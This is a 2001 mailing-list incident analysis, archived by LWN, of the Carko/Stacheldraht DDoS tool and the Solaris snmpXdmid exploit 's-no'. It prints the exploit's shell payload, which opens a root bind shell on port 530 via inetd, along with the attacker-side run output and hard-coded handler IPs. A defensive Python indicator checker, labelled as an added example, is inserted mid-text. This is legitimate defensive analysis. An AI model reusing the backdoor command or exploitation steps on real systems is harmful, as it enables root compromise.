[LWN.net]
From:	 Ryan Russell 
To:	 INCIDENTS@SECURITYFOCUS.COM
Subject: Carko/snmpXdmid Analysis v1.0
Date:	 Wed, 18 Apr 2001 17:17:40 -0600

Carko/Stacheldraht v1.666 + antigl + yps Distributed Denial of Service Tool

4/18/2001 v1.0

The SecurityFocus ARIS Analyst Team wishes to thank Stefan Wagner for his
contribution of the s-no binary, Borja Marcos for his contribution of
files from a compromised host that had a rootkit installed, Kurt
Grutzmacher for the source code to the Solaris x86 8 exploit, and our
anonymous contributors.

There have been recent reports of an allegedly new Distributed Denial of
Service (DDOS) tool being deployed in the wild named "Carko". Upon
further analysis of this tool, it has been confirmed that "Carko" is
actually a copy of "Stacheldraht v1.666 + antigl + yps", originally
released by Psychoid and Randomizer in January of this year, with some minor
modifications.  Carko was initially publicized to the Incidents mailing
list by an anonymous source.

"Stacheldraht v1.666 + antigl + yps" is a variant of the original
"Stacheldraht" DDOS tool, which was based upon the "Tribal Flood Network"
and "trin00" DDOS tools.  As many of you may recall, these DDOS tools were
implicated in crippling many high-profile e-commerce sites such as Yahoo!,
eBay, Amazon, etc. during February of 2000 by overwhelming these servers
with enormous amounts of traffic, thus preventing legitimate requests from
being fulfilled.

Carko is a near replica of Stacheldraht v1.666 + antigl + yps with some
very slight variations:

1) Inspection of the binaries reveals that as little as one line of source
code differs between Carko and Stacheldraht v1.666 + antigl + yps.  Carko
contains a different hard-coded IP address, 209.198.242.114, used to test
spoofing while Stacheldraht v1.666 + antigl + yps uses the address
3.3.3.3.

2) The Carko executable can be typically found in the directory
/usr/share/man/mansps/ddos/carko.

3) It has been reported that a file named td was copied from elsewhere to
the compromised host and given the local name carko during the rcp
process.  td is the original name of the "client" in Stacheldraht v1.666 +
antigl + yps, of which Carko is a modification.

There are two hard-coded master servers (handlers) in this version of
Carko.  Master servers are added during the make process.  These are:

131.216.135.41, sunset.ccsn.nevada.edu
152.2.21.117, cc-matrix6.oit.unc.edu

While Carko is fundamentally just a rehash of a dated yet still effective
DDOS tool, attackers are using much more recent exploits in order to
deploy Carko/Stacheldraht v1.666 + antigl + yps.  Specifically, there
have been reported cases of the Solaris snmpXdmid buffer overflow
vulnerability being exploited in order to backdoor systems and deploy
Carko.  The snmpXdmid vulnerability was reported on March 15, 2001, and a
working exploit is being used in the wild.  Because snmpXdmid is a
service started as root, any code executed by an unauthorized malicious
attacker runs with superuser privileges.  For more information regarding
this vulnerability, please see the following database entry:

http://www.securityfocus.com/bid/2417

Typically, hosts are initially scanned for the RPC Portmapper (port 111)
requesting RPC program number 1000249, version 1, protocol 6 (TCP).  This
is the snmpXdmid service, usually started via /etc/rc3.d/S77dmi.  After
verifying that snmpXdmid is indeed running, an attacker may compromise the
system via the buffer overflow vulnerability.  While the attacker can
perform virtually any action they so desire if successful exploitation
occurs, many users have reported that a backdoor, and subsequently Carko,
have been installed following snmpXdmid exploitation.


SnmpXdmid/s-no Exploit Analysis

At least one binary copy of the snmpXdmid exploit has been found in the
wild.  It was discovered on a honeypot host and was named s-no.  It is a
Sparc ELF binary, compiled with Sun's WorkShop Compiler 4.2 on a Solaris
2.6 host.

The exploit is run from the command-line, and takes a victim IP address,
and a victim OS version number as input.  The exploit helpfully provides
instructions if the parameters are not supplied:

# ./s-no
snmpXdmisd exploit for solaris SPARC
Usage : ./s-no hostname 6|7|8
E.g. $ ./s-no 127.0.0.1 6 (for solaris 2.6)

Upon running with the proper parameters, it queries the victim for the
vulnerable daemon via portmapper, as noted previously.  It then connects
to the vulnerable service, and delivers the overflow string.  Contained
within the string is the set of commands that will be executed on the
victim upon successful exploitation:

echo courier stream tcp nowait root /bin/sh sh -i >
/tmp/.x;/usr/sbin/inetd -s /tmp/.x;rm -f /tmp/.x;nohup
/etc/init.d/init.dmi start 1>&2 2>/dev/null &\;

The above set of commands creates a root shell on port 530 ("courier" is
mapped to 530 in /etc/services), cleans up its temp file, and restarts
the DMI daemon, which crashed during the overflow.

By itself, this is easy to clean up after: simply stop or upgrade the
vulnerable DMI daemon.  Once the port 530 backdoor has been connected to,
it does not restart.  However, as was previously noted, the attacker usually
connects to port 530 immediately and installs additional software, such as
Carko.  In at least one instance, a full rootkit was installed.
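A host-side triage check for the indicators this analysis lists, written as an added example (it is not part of the original note or of any SecurityFocus tooling): it takes captured `netstat -an` and `ps -ef` output and flags a port 530 listener, an inetd started from a /tmp config, the carko binary path or a carko/td process, and connections to the two hard-coded master servers. The sample command output is constructed in a Solaris-like layout.

```python
"""Triage helper for the Carko/snmpXdmid indicators in this analysis.

Added example, not part of the original note.  Indicator values (port 530,
the carko path, the master server addresses) are taken from the analysis;
the sample netstat/ps output below is constructed.
"""
import re

MASTER_SERVERS = {"131.216.135.41", "152.2.21.117"}   # hard-coded handlers
CARKO_DIR = "/usr/share/man/mansps/ddos/carko"
BACKDOOR_PORT = 530                                    # "courier" in /etc/services

# Constructed sample output, Solaris-style column layout.
SAMPLE_NETSTAT = """\
      *.530                *.*                0      0 24576      0 LISTEN
192.168.1.5.33021    131.216.135.41.65000  8760      0 24820      0 ESTABLISHED
192.168.1.5.22       10.0.0.9.40122        8760      0 24820      0 ESTABLISHED
"""
SAMPLE_PS = """\
    root   142     1  0 10:01:33 ?        0:00 /usr/sbin/inetd -s /tmp/.x
    root   301     1  0 10:02:10 ?        0:03 /usr/share/man/mansps/ddos/carko
    root   150     1  0 10:01:40 ?        0:00 /usr/lib/dmi/snmpXdmid -s hostname
"""

def find_indicators(netstat_out, ps_out):
    """Return a list of indicator descriptions found in the two outputs."""
    hits = []
    for line in netstat_out.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue
        local, remote = fields[0], fields[1]
        if "LISTEN" in fields and local.endswith(f".{BACKDOOR_PORT}"):
            hits.append(f"listener on port {BACKDOOR_PORT} (courier backdoor)")
        rhost = remote.rsplit(".", 1)[0]        # strip the port from a.b.c.d.port
        if rhost in MASTER_SERVERS:
            hits.append(f"connection to Stacheldraht master {rhost}")
    for line in ps_out.splitlines():
        if "/usr/sbin/inetd -s /tmp/" in line:   # inetd fed a throwaway config
            hits.append("inetd started with a /tmp config (backdoor launch)")
        if CARKO_DIR in line or re.search(r"\s(carko|td)(\s|$)", line):
            hits.append("carko/td process running")
    return hits

if __name__ == "__main__":
    for hit in find_indicators(SAMPLE_NETSTAT, SAMPLE_PS):
        print("INDICATOR:", hit)
```

On a live host, feed it the real `netstat -an` and `ps -ef` output; a clean system returns an empty list.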

Here's what s-no looks like from the attacker's perspective:

$ ./s-no 64.81.99.152 6
retaddr = 0xef4a4398
safeaddr = 0xef20b330

clnt_create: RPC: Unknown host
$
$ ./s-no 64.81.99.152 7
retaddr = 0xff0369e0
safeaddr = 0xfea0b644

clnt_call[_DmiComponentAdded]: RPC: Timed out

Now try to connect the target 530 port, good luck.:)
$
$ ./s-no 64.81.99.152 8
retaddr = 0xff0369e0
safeaddr = 0xfea0b644

clnt_call[_DmiComponentAdded]: RPC: Timed out

Now try to connect the target 530 port, good luck.:)
$

The attack for Solaris 6 has a different set of offsets from 7 and 8, and
does not appear to work properly, at least not from our Solaris 7 test
platform.  The attacks for 7 and 8 execute as expected.  The RPC timeout
message is due to the remote victim service dying following delivery of
the exploit.  The exploit then goes on to invite the attacker to connect
to port 530.  The exploit is not successful in every single case, as at
least one victim machine we tested didn't execute the commands as
expected, though it was vulnerable.  The DMI daemon still crashed,
however, which blocks further attempts until it is restarted.  This
particular exploit contains Sparc shellcode, so it won't work on Solaris
x86 as-is, but an x86 version should be easy to create, so that is no
guarantee of safety.  There also exists what is reported to be a Solaris
x86 8 exploit.

Attached to this note is a packet trace, truss output, and a capture of
the TCP data sent, captured by using netcat to listen on a port that
portmapper was configured to advertise as the vulnerable service.

This is the first version of this analysis.  Additional versions will be
published soon, containing analysis of a rootkit that was installed in one
instance of an snmpXdmid compromise, and analysis of source code to a
reported Solaris x86 8 exploit for snmpXdmid, which is different from the
one discussed in this document.

Resources:

"Carko Information" Incidents Mailing List Message
http://www.securityfocus.com/archive/75/177265

New Variants of Trinity and Stacheldraht Distributed Denial of Service Tools
http://xforce.iss.net/alerts/advise61.php

"Trinity v3/ Stacheldraht 1.666" Distributed Denial of Service Tool
http://www.nipc.gov/warnings/advisories/2000/00-055.htm

The "Stacheldraht" distributed denial of service attack tool
http://www.securityfocus.com/library/1999

Distributed Denial of Service Defense Tactics
http://www.securityfocus.com/library/1930

Solaris snmpXdmid Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/2417